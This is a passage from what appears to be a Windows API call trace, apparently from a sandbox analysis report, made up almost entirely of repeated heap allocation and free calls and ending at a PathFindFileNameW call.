Size=0x60) returned 0x2c6fdf8 [0189.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0189.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.646] PathFindFileNameW 